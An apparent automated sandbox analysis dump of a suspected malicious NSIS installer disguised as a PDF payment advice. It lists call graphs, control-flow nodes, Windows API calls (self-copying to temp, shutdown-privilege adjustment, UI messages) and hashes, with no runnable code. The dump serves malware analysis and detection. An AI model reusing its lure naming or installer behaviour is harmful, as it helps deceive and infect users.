402cc9 4597->4608 4599 402434 4600 402bbf 18 API calls 4599->4600 4601 40243d 4600->4601 4602 402448 RegQueryValueExW 4601->4602 4603 40281e 4601->4603 4604 402468 4602->4604 4607 40246e RegCloseKey 4602->4607 4604->4607 4612 405f9c wsprintfW 4604->4612 4607->4603 4609 402bbf 18 API calls 4608->4609 4610 402ce2 4609->4610 4611 402cf0 RegOpenKeyExW 4610->4611 4611->4599 4612->4607 5302 40422d lstrcpynW lstrlenW 5303 40172d 5304 402bbf 18 API calls 5303->5304 5305 401734 SearchPathW 5304->5305 5306 40174f 5305->5306 4613 404b30 GetDlgItem GetDlgItem 4614 404b82 7 API calls 4613->4614 4617 404d9b 4613->4617 4615 404c25 DeleteObject 4614->4615 4616 404c18 SendMessageW 4614->4616 4618 404c2e 4615->4618 4616->4615 4624 404e60 4617->4624 4627 404e7f 4617->4627 4631 404dfb 4617->4631 4619 404c65 4618->4619 4620 404c3d 4618->4620 4621 404119 19 API calls 4619->4621 4623 406077 18 API calls 4620->4623 4625 404c79 4621->4625 4622 404f2b 4628 404f35 SendMessageW 4622->4628 4629 404f3d 4622->4629 4630 404c47 SendMessageW SendMessageW 4623->4630 4624->4627 4636 404e71 SendMessageW 4624->4636 4633 404119 19 API calls 4625->4633 4626 405113 4635 404180 8 API calls 4626->4635 4627->4622 4627->4626 4634 404ed8 SendMessageW 4627->4634 4628->4629 4637 404f56 4629->4637 4638 404f4f ImageList_Destroy 4629->4638 4645 404f66 4629->4645 4630->4618 4632 404a7e 5 API calls 4631->4632 4650 404e0c 4632->4650 4651 404c87 4633->4651 4634->4626 4640 404eed SendMessageW 4634->4640 4641 405121 4635->4641 4636->4627 4642 404f5f GlobalFree 4637->4642 4637->4645 4638->4637 4639 4050d5 4639->4626 4646 4050e7 ShowWindow GetDlgItem ShowWindow 4639->4646 4644 404f00 4640->4644 4642->4645 4643 404d5c GetWindowLongW SetWindowLongW 4647 404d75 4643->4647 4655 404f11 SendMessageW 4644->4655 4645->4639 4660 404afe 4 API calls 4645->4660 4663 404fa1 4645->4663 4646->4626 4648 404d93 4647->4648 4649 404d7b ShowWindow 4647->4649 4670 40414e SendMessageW 4648->4670 4669 40414e SendMessageW 4649->4669 4650->4624 4651->4643 4654 404cd7 SendMessageW 4651->4654 4656 404d56 4651->4656 4658 404d13 SendMessageW 4651->4658 4659 404d24 SendMessageW 4651->4659 4654->4651 4655->4622 4656->4643 4656->4647 4657 404d8e 4657->4626 4658->4651 4659->4651 4660->4663 4661 4050ab InvalidateRect 4661->4639 4662 4050c1 4661->4662 4671 404a39 4662->4671 4664 404fcf SendMessageW 4663->4664 4665 404fe5 4663->4665 4664->4665 4665->4661 4666 405046 4665->4666 4668 405059 SendMessageW SendMessageW 4665->4668 4666->4668 4668->4665 4669->4657 4670->4617 4674 404970 4671->4674 4673 404a4e 4673->4639 4675 404989 4674->4675 4676 406077 18 API calls 4675->4676 4677 4049ed 4676->4677 4678 406077 18 API calls 4677->4678 4679 4049f8 4678->4679 4680 406077 18 API calls 4679->4680 4681 404a0e lstrlenW wsprintfW SetDlgItemTextW 4680->4681 4681->4673 5307 4045b4 5308 4045e0 5307->5308 5309 4045f1 5307->5309 5368 40577e GetDlgItemTextW 5308->5368 5310 4045fd GetDlgItem 5309->5310 5313 40465c 5309->5313 5312 404611 5310->5312 5317 404625 SetWindowTextW 5312->5317 5320 405ab4 4 API calls 5312->5320 5314 404740 5313->5314 5322 406077 18 API calls 5313->5322 5366 4048ef 5313->5366 5314->5366 5370 40577e GetDlgItemTextW 5314->5370 5315 4045eb 5316 4062e9 5 API calls 5315->5316 5316->5309 5321 404119 19 API calls 5317->5321 5319 404180 8 API calls 5324 404903 5319->5324 5325 40461b 5320->5325 5326 404641 5321->5326 5327 4046d0 SHBrowseForFolderW 5322->5327 5323 404770 5328 405b11 18 API calls 5323->5328 5325->5317 5332 405a09 3 API calls 5325->5332 5329 404119 19 API calls 5326->5329 5327->5314 5330 4046e8 CoTaskMemFree 5327->5330 5331 404776 5328->5331 5333 40464f 5329->5333 5334 405a09 3 API calls 5330->5334 5371 406055 lstrcpynW 5331->5371 5332->5317 5369 40414e SendMessageW 5333->5369 5342 4046f5 5334->5342 5337 404655 5341 40642b 5 API calls 5337->5341 5338 40472c SetDlgItemTextW 5338->5314 5339 40478d 5340 40642b 5 API calls 5339->5340 5349 404794 5340->5349 5341->5313 5342->5338 5343 406077 18 API calls 5342->5343 5344 404714 lstrcmpiW 5343->5344 5344->5338 5346 404725 lstrcatW 5344->5346 5345 4047d5 5372 406055 lstrcpynW 5345->5372 5346->5338 5348 4047dc 5350 405ab4 4 API calls 5348->5350 5349->5345 5354 405a55 2 API calls 5349->5354 5355 40482d 5349->5355 5351 4047e2 GetDiskFreeSpaceW 5350->5351 5353 404806 MulDiv 5351->5353 5351->5355 5353->5355 5354->5349 5356 40489e 5355->5356 5358 404a39 21 API calls 5355->5358 5357 4048c1 5356->5357 5359 40140b 2 API calls 5356->5359 5373 40413b EnableWindow 5357->5373 5360 40488b 5358->5360 5359->5357 5361 4048a0 SetDlgItemTextW 5360->5361 5362 404890 5360->5362 5361->5356 5364 404970 21 API calls 5362->5364 5364->5356 5365 4048dd 5365->5366 5374 404549 5365->5374 5366->5319 5368->5315 5369->5337 5370->5323 5371->5339 5372->5348 5373->5365 5375 404557 5374->5375 5376 40455c SendMessageW 5374->5376 5375->5376 5376->5366 5377 4027b4 5378 4027ba 5377->5378 5379 4027c2 FindClose 5378->5379 5380 402a4c 5378->5380 5379->5380 5381 4042b6 5382 4042ce 5381->5382 5386 4043e8 5381->5386 5387 404119 19 API calls 5382->5387 5383 404452 5384 404524 5383->5384 5385 40445c GetDlgItem 5383->5385 5391 404180 8 API calls 5384->5391 5388 404476 5385->5388 5392 4044e5 5385->5392 5386->5383 5386->5384 5389 404423 GetDlgItem SendMessageW 5386->5389 5390 404335 5387->5390 5388->5392 5396 40449c 6 API calls 5388->5396 5412 40413b EnableWindow 5389->5412 5394 404119 19 API calls 5390->5394 5395 40451f 5391->5395 5392->5384 5397 4044f7 5392->5397 5401 404342 CheckDlgButton 5394->5401 5396->5392 5398 40450d 5397->5398 5399 4044fd SendMessageW 5397->5399 5398->5395 5402 404513 SendMessageW 5398->5402 5399->5398 5400 40444d 5403 404549 SendMessageW 5400->5403 5410 40413b EnableWindow 5401->5410 5402->5395 5403->5383 5405 404360 GetDlgItem 5411 40414e SendMessageW 5405->5411 5407 404376 SendMessageW 5408 404393 GetSysColor 5407->5408 5409 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5407->5409 5408->5409 5409->5395 5410->5405 5411->5407 5412->5400 4704 401b37 4705 401b44 4704->4705 4706 401b88 4704->4706 4707 401bcd 4705->4707 4712 401b5b 4705->4712 4708 401bb2 GlobalAlloc 4706->4708 4709 401b8d 4706->4709 4711 406077 18 API calls 4707->4711 4719 402288 4707->4719 4710 406077 18 API calls 4708->4710 4709->4719 4725 406055 lstrcpynW 4709->4725 4710->4707 4713 402282 4711->4713 4723 406055 lstrcpynW 4712->4723 4717 40579a MessageBoxIndirectW 4713->4717 4716 401b9f GlobalFree 4716->4719 4717->4719 4718 401b6a 4724 406055 lstrcpynW 4718->4724 4721 401b79 4726 406055 lstrcpynW 4721->4726 4723->4718 4724->4721 4725->4716 4726->4719 5413 402537 5414 402562 5413->5414 5415 40254b 5413->5415 5417 402596 5414->5417 5418 402567 5414->5418 5416 402ba2 18 API calls 5415->5416 5425 402552 5416->5425 5419 402bbf 18 API calls 5417->5419 5420 402bbf 18 API calls 5418->5420 5421 40259d lstrlenW 5419->5421 5422 40256e WideCharToMultiByte lstrlenA 5420->5422 5421->5425 5422->5425 5423 4025ca 5424 4025e0 5423->5424 5426 405cdc WriteFile 5423->5426 5425->5423 5425->5424 5427 405d0b 5 API calls 5425->5427 5426->5424 5427->5423 5428 4014b8 5429 4014be 5428->5429 5430 401389 2 API calls 5429->5430 5431 4014c6 5430->5431 4733 4015b9 4734 402bbf 18 API calls 4733->4734 4735 4015c0 4734->4735 4736 405ab4 4 API calls 4735->4736 4748 4015c9 4736->4748 4737 401629 4738 40165b 4737->4738 4739 40162e 4737->4739 4743 401423 25 API calls 4738->4743 4741 401423 25 API calls 4739->4741 4740 405a36 CharNextW 4740->4748 4742 401635 4741->4742 4752 406055 lstrcpynW 4742->4752 4750 401653 4743->4750 4745 405700 2 API calls 4745->4748 4746 40571d 5 API calls 4746->4748 4747 401642 SetCurrentDirectoryW 4747->4750 4748->4737 4748->4740 4748->4745 4748->4746 4749 40160f GetFileAttributesW 4748->4749 4751 405683 4 API calls 4748->4751 4749->4748 4751->4748 4752->4747 5432 10002a7f 5433 10002a97 5432->5433 5434 1000158f 2 API calls 5433->5434 5435 10002ab2 5434->5435

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 34 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->34 35 403526-403540 DeleteFileW call 402dee 25->35 30 4033b9-4033bd 27->30 31 4033be-4033c2 27->31 28->27 28->28 30->31 32 403480-40348d call 405a36 31->32 33 4033c8-4033ce 31->33 53 403491-403497 32->53 54 40348f-403490 32->54 36 4033d0-4033d7 33->36 37 4033e8-403421 33->37 34->35 52 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 34->52 48 4035f1-403602 call 4037c4 OleUninitialize 35->48 49 403546-40354c 35->49 42 4033d9-4033dc 36->42 43 4033de 36->43 44 403423-403428 37->44 45 40343e-403478 37->45 42->37 42->43 43->37 44->45 50 40342a-403432 44->50 45->32 51 40347a-40347e 45->51 71 403728-40372e 48->71 72 403608-403618 call 40579a ExitProcess 48->72 56 4035e1-4035e8 call 40389e 49->56 57 403552-40355d call 405a36 49->57 59 403434-403437 50->59 60 403439 50->60 51->32 61 40349f-4034ad call 406055 51->61 52->35 52->48 53->24 55 40349d 53->55 54->53 63 4034b2 55->63 70 4035ed 56->70 73 4035ab-4035b5 57->73 74 40355f-403594 57->74 59->45 59->60 60->45 61->63 63->25 70->48 76 403730-403746 GetCurrentProcess OpenProcessToken 71->76 77 4037ac-4037b4 71->77 81 4035b7-4035c5 call 405b11 73->81 82 40361e-403632 call 40571d lstrcatW 73->82 78 403596-40359a 74->78 84 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 76->84 85 40377c-40378a call 40642b 76->85 79 4037b6 77->79 80 4037ba-4037be ExitProcess 77->80 87 4035a3-4035a7 78->87 88 40359c-4035a1 78->88 79->80 81->48 97 4035c7-4035dd call 406055 * 2 81->97 98 403634-40363a lstrcatW 82->98 99 40363f-403659 lstrcatW lstrcmpiW 82->99 84->85 95 403798-4037a3 ExitWindowsEx 85->95 96 40378c-403796 85->96 87->78 92 4035a9 87->92 88->87 88->92 92->73 95->77 101 4037a5-4037a7 call 40140b 95->101 96->95 96->101 97->56 98->99 99->48 100 40365b-40365e 99->100 104 403660-403665 call 405683 100->104 105 403667 call 405700 100->105 101->77 113 40366c-40367a SetCurrentDirectoryW 104->113 105->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 125 40371c-403723 call 405ef6 122->125 123->122 124 4036e5-403705 call 405ef6 call 406077 call 405735 123->124 124->122 134 403707-40370e CloseHandle 124->134 125->48 134->122
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                                                    • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                                    • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                                    • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                                    • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe",00000000), ref: 00403363
                                                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe",00000020), ref: 0040338A
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                                                    • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe",00000000,?), ref: 0040362B
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe",00000000,?), ref: 0040363A
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe",00000000,?), ref: 00403645
                                                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe",00000000,?), ref: 00403651
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                                                    • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe,0042AA28,00000001), ref: 004036DB
                                                                                                                                    • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                    • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                    • String ID: "C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                    • API String ID: 3586999533-1468879437
                                                                                                                                    • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                    • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                    • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                    • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 149 404eb3-404eba 144->149 152 404de4-404deb 145->152 153 404dd7-404dde 145->153 150 404c40-404c5d call 406077 SendMessageW * 2 146->150 151 404c3d 146->151 147->143 148 404c65-404c91 call 404119 * 2 147->148 191 404c97-404c9d 148->191 192 404d5c-404d6f GetWindowLongW SetWindowLongW 148->192 155 404f2b-404f33 149->155 156 404ebc-404ec2 149->156 150->147 151->150 158 404e60-404e63 152->158 159 404ded-404df0 152->159 153->149 153->152 164 404f35-404f3b SendMessageW 155->164 165 404f3d-404f44 155->165 161 405113-405125 call 404180 156->161 162 404ec8-404ed2 156->162 158->149 163 404e65-404e6f 158->163 167 404df2-404df9 159->167 168 404dfb-404e10 call 404a7e 159->168 162->161 173 404ed8-404ee7 SendMessageW 162->173 175 404e71-404e7d SendMessageW 163->175 176 404e7f-404e89 163->176 164->165 169 404f46-404f4d 165->169 170 404f78-404f7f 165->170 167->158 167->168 168->158 190 404e12-404e23 168->190 178 404f56-404f5d 169->178 179 404f4f-404f50 ImageList_Destroy 169->179 182 4050d5-4050dc 170->182 183 404f85-404f91 call 4011ef 170->183 173->161 184 404eed-404efe SendMessageW 173->184 175->176 176->149 177 404e8b-404e95 176->177 186 404ea6-404eb0 177->186 187 404e97-404ea4 177->187 188 404f66-404f72 178->188 189 404f5f-404f60 GlobalFree 178->189 179->178 182->161 196 4050de-4050e5 182->196 209 404fa1-404fa4 183->209 210 404f93-404f96 183->210 194 404f00-404f06 184->194 195 404f08-404f0a 184->195 186->149 187->149 188->170 189->188 190->158 197 404e25-404e27 190->197 198 404ca0-404ca7 191->198 202 404d75-404d79 192->202 194->195 200 404f0b-404f24 call 401299 SendMessageW 194->200 195->200 196->161 201 4050e7-405111 ShowWindow GetDlgItem ShowWindow 196->201 205 404e29-404e30 197->205 206 404e3a 197->206 207 404d3d-404d50 198->207 208 404cad-404cd5 198->208 200->155 201->161 203 404d93-404d9b call 40414e 202->203 204 404d7b-404d8e ShowWindow call 40414e 202->204 203->137 204->161 214 404e32-404e34 205->214 215 404e36-404e38 205->215 218 404e3d-404e59 call 40117d 206->218 207->198 222 404d56-404d5a 207->222 216 404cd7-404d0d SendMessageW 208->216 217 404d0f-404d11 208->217 223 404fe5-405009 call 4011ef 209->223 224 404fa6-404fbf call 4012e2 call 401299 209->224 219 404f98 210->219 220 404f99-404f9c call 404afe 210->220 214->218 215->218 216->207 228 404d13-404d22 SendMessageW 217->228 229 404d24-404d3a SendMessageW 217->229 218->158 219->220 220->209 222->192 222->202 237 4050ab-4050bf InvalidateRect 223->237 238 40500f 223->238 242 404fc1-404fc7 224->242 243 404fcf-404fde SendMessageW 224->243 228->207 229->207 237->182 240 4050c1-4050d0 call 404a51 call 404a39 237->240 241 405012-40501d 238->241 240->182 244 405093-4050a5 241->244 245 40501f-40502e 241->245 247 404fc9 242->247 248 404fca-404fcd 242->248 243->223 244->237 244->241 250 405030-40503d 245->250 251 405041-405044 245->251 247->248 248->242 248->243 250->251 252 405046-405049 251->252 253 40504b-405054 251->253 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->244 256->255
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2031943326.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2031927288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2031956799.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032009204.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2032182065.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $M$N
                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                    • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                    • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                                    • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                    • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2036183059.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2036170525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036195897.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2036208769.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$lstrcpy$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4227406936-0
